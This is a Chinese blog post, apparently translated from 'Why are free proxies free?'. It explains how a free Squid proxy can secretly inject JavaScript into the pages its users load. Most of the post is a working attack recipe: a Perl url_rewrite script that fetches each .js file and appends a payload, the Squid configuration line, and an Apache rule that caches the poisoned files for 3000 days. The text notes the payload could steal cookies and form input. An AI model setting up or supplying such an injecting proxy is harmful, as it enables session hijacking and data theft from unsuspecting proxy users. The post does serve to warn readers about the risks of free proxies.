为什么会有免费代理?

五道口杀气 | 2015-01-04 12:14

因为这是一个很简单就可以收集用户数据的方法。

所有的工作都是可以通过修改SQUID配置达到。

1.[Server] 在linux服务器上安装Squid服务。

2.[Payload] 修改服务端配把所有的javascript文件都加上一段我们自己的代码。

3.[Cache] 修改.js文件的缓存时间。

作者搭建了一个代理服务器,过了几天有超过5000个人用他的代理,大多数的人是用来做坏的事情,但是他们没有想到的是,代理服务器也可以对他们做坏的事情。

做你自己的植入js文件的代理服务器

除了你自己的squid代理服务器外,你还需要一个web服务器,这里用Apache为例:

1.创建payload,这里只是修改a标签连接为例,实际过程可以偷取cookie,获取提交表单内容等。

for(var i=0;i<document.getElementsByTagName('a').length;i++)
    document.getElementsByTagName('a')[i].href = "https://blog.haschek.at";

2.写squid脚本文件,来修改所有的.js文件:

/etc/squid/poison.pl

#!/usr/bin/perl

$|=1;
$count = 0;
$pid = $$;

while(<>)
{
  chomp $_;
  if($_ =- /(.*\.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
  }
  else
  {
        print "$_\n";
  }
$count++;
}

脚本用wget获取页面原始的javascript文件,然后吧/etc/squid/payload.js文件添加进去,修改后的文件返回到客户端,同时你需要创建/var/www/tmp目录,并允许squid在其中写文件。这个目录存修改后的js文件。

3.告诉squid使用该脚本

在/etc/squid/squid.conf中添加

url_rewrite_program /etc/squid/poison.pl

4.设置js文件缓存时间

/var/www/tmp/.htaccess

ExpiresActive On 
ExpiresDefault "access plus 3000 days" 

告诉Apache服务器设置超长缓存时间,除非客户端清除浏览器缓存。

原文地址:Why are free proxies free?

相关内容:

JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪

浅谈反向代理对SEO的影响

CVE-2014-0509 使用⾼半代理(0xD800~0xDBFF)的 Flash XSS

关于 linux shell 内网如何做代理

使用代理ip,浏览器会被网站获取到哪些信息?如何刷广告联盟不被发现?

Asp反向代理程序,调用远程站点全站数据,一款脚本级反向代理程序

多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己

基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线?

只有webshell,一样可以做代理,如何使用脚本程序做代理

如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪?

反向代理的有趣用法

警告:用虚拟机上QQ,挂全局Socks代理的请注意,UDP协议暴露真实IP

反向代理在Web渗透测试中的运用

为何互联网上会存在大量代理服务器?代理发布站的代理是哪里来的?

King Of The Proxy (代理之王) v1.0 发布、HTTP代理采集、验证工具

WinHttpRequest SetProxy 方法详解,设置代理服务器信息

绕过CDN的思路,绕过CDN查找真实IP的思路,一个新颖并另类的方法

【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的!

查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法

【文章】4.4 指定的确认者签名 4.5 代理签名

【Asp技巧】Asp绕过代理获取真实IP方法

【文章】Http代理穿透技术

留言评论(旧系统):

佚名 @ 2015-01-09 13:50:05

666,深藏功与名

本站回复:

-_-!!!

天朝良民 @ 2015-01-10 15:20:52

原来如此。这些免费代理有一部分是为了收集用户数据而开放的

本站回复:

很多都是。